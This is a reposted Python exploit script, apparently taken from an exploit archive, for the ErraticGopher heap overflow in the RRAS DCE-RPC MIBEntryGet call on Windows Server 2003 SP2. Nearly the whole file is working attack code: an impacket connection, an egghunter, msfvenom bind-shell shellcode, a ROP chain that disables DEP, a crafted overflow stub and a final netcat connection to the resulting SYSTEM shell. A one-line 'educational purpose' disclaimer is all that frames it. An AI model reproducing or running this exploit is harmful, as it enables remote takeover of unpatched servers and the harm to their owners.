WIN 2003 SP2 - SMB Remote Code Execution (ERRATICGOPHER) Exploit

admin

1. #!/usr/bin/env python
   
2. # -*- coding: utf-8 -*-
   
3. ##################################################################################
   
4. #   By Victor Portal (vportal) for educational porpouse only     
   
5. ##################################################################################
   
6. #   This exploit is the python version of the ErraticGopher exploit probably     #
   
7. #   with some modifications. ErraticGopher exploits a memory corruption          #
   
8. #   (seems to be a Heap Overflow) in the Windows DCE-RPC Call MIBEntryGet.       #
   
9. #   Because the Magic bytes, the application redirects the execution to the      #
   
10. #   iprtrmgr.dll library, where a instruction REPS MOVS (0x641194f5) copy        #
    
11. #   all te injected stub from the heap to the stack, overwritten a return        #
    
12. #   address as well as the SEH handler stored in the Stack, being possible       #
    
13. #   to control the execution flow to disable DEP and jump to the shellcode       #
    
14. #   as SYSTEM user.                                                              #
    
15. ##################################################################################
    
16. #The exploit only works if target has the RRAS service enabled
    
17. #Tested on Windows Server 2003 SP2
    
18.   
    
19. import struct
    
20. import sys
    
21. import time
    
22. import os
    
23.   
    
24. from threading import Thread   
    
25.                                  
    
26. from impacket import smb
    
27. from impacket import uuid
    
28. from impacket import dcerpc
    
29. from impacket.dcerpc.v5 import transport
    
30.                   
    
31. target = sys.argv[1]
    
32.   
    
33. print '[-]Initiating connection'
    
34. trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
    
35. trans.connect()
    
36.   
    
37. print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target
    
38. dce = trans.DCERPC_class(trans)
    
39. #RRAS DCE-RPC CALL
    
40. dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))
    
41.   
    
42. egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
    
43. egghunter += "\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
    
44.   
    
45. #msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python
    
46. buf =  ""
    
47. buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
    
48. buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
    
49. buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
    
50. buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
    
51. buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
    
52. buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
    
53. buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
    
54. buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
    
55. buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
    
56. buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
    
57. buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
    
58. buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
    
59. buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
    
60. buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
    
61. buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
    
62. buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
    
63. buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
    
64. buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
    
65. buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
    
66. buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
    
67. buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
    
68. buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
    
69. buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
    
70. buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
    
71. buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
    
72. buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
    
73. buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
    
74. buf += "\xc4\x25\x3d\xe9"
    
75.   
    
76. #NX disable routine for Windows Server 2003 SP2
    
77. rop = "\x30\xdb\xc0\x71" #push esp, pop ebp, retn ws_32.dll
    
78. rop += "\x45"*16
    
79. rop += "\xe9\x77\xc1\x77" #push esp, pop ebp, retn 4 gdi32.dll
    
80. rop += "\x5d\x7a\x81\x7c" #ret 20
    
81. rop += "\x71\x42\x38\x77" #jmp esp
    
82. rop += "\xf6\xe7\xbd\x77" #add esp,2c ; retn msvcrt.dll
    
83. rop += "\x90"*2 + egghunter + "\x90"*42
    
84. rop += "\x17\xf5\x83\x7c" #Disable NX routine
    
85. rop += "\x90"*4
    
86.   
    
87. stub = "\x21\x00\x00\x00\x10\x27\x00\x00\x30\x07\x00\x00\x00\x40\x51\x06\x04\x00\x00\x00\x00\x85\x57\x01\x30\x07\x00\x00\x08\x00\x00\x00" #Magic bytes
    
88. stub += "\x41"*20 + rop + "\xCC"*100 + "w00tw00t" + buf + "\x42"*(1313-20-len(rop)-100-8-len(buf))
    
89. stub += "\x12" #Magic byte
    
90. stub += "\x46"*522
    
91. stub += "\x04\x00\x00\x00\x00\x00\x00\x00" #Magic bytes
    
92.   
    
93.   
    
94. dce.call(0x1d, stub)   #0x1d MIBEntryGet (vulnerable function)
    
95. print "[-]Exploit sent to target successfully..."
    
96.   
    
97. print "Waiting for shell..."
    
98. time.sleep(5)
    
99. os.system("nc " + target + " 4444")
    
100. 
     
101. #  0day.today [2017-04-26]  #

复制代码